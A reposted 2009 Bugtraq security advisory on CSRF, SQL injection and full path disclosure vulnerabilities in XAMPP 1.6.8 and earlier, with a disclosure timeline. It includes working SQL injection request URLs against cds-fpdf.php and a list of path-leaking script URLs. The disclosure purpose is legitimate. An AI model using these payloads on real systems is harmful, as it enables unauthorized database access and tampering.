Multiple vulnerabilities in XAMPP

简介: http://www.securityfocus.com/bid/37999/exploit Hello Bugtraq!I am continue informing you about multiple vulnerabilities in XAMPP.

http://www.securityfocus.com/bid/37999/exploit

 

Hello Bugtraq!

I am continue informing you about multiple vulnerabilities in XAMPP.

-----------------------------
Advisory #7
-----------------------------
CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP
-----------------------------
URL: http://websecurity.com.ua/3285/
-----------------------------
Timeline:

27.06.2009 - found the vulnerabilities.
01.07.2009 - announced at my site.
02.07.2009 - informed developers.
08.08.2009 - disclosed at my site.
-----------------------------
Details:

These are Cross-Site Request Forgery, SQL Injection and Full path disclosure
vulnerabilities.

CSRF:

http://site/xampp/cds-fpdf.php

It's possible to delete or add data in test table (as via CSRF, and as via
Insufficient Authorization vulnerabilities). And also to conduct SQL
Injection via CSRF attacks.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals
on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,
1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/
*
(mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq
off)

Attack is possible during access to admin panel (via Insufficient
Authorization), or via CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).

-----------------------------

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

目录
打赏
0
0
0
0
680
分享
相关文章
|
8月前
|
Vulnerability
【7月更文挑战第2天】
115 1
5 Reasons Why You Should Try Kibana
Kibana offers its users several powerful and convenient development tools along with time series data, query data map analysis, and geographic location analysis.
7036 0
5 Reasons Why You Should Try Kibana
What Is ElectronJS and Why Should You Use It?
In this three-part tutorial, we will explore how to create a fully functional invoice application using ElectronJS and ApsaraDB for MongoDB.
2770 0
What Is ElectronJS and Why Should You Use It?
Multiple vulnerabilities in Cacti 0.8.8b and lower
The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.
916 0
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
Author: Janek Vind "waraxe"Date: 25. April 2013Location: Estonia, TartuWeb: http://www.
721 0
Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
Hello list! Earlier I've wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.
948 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等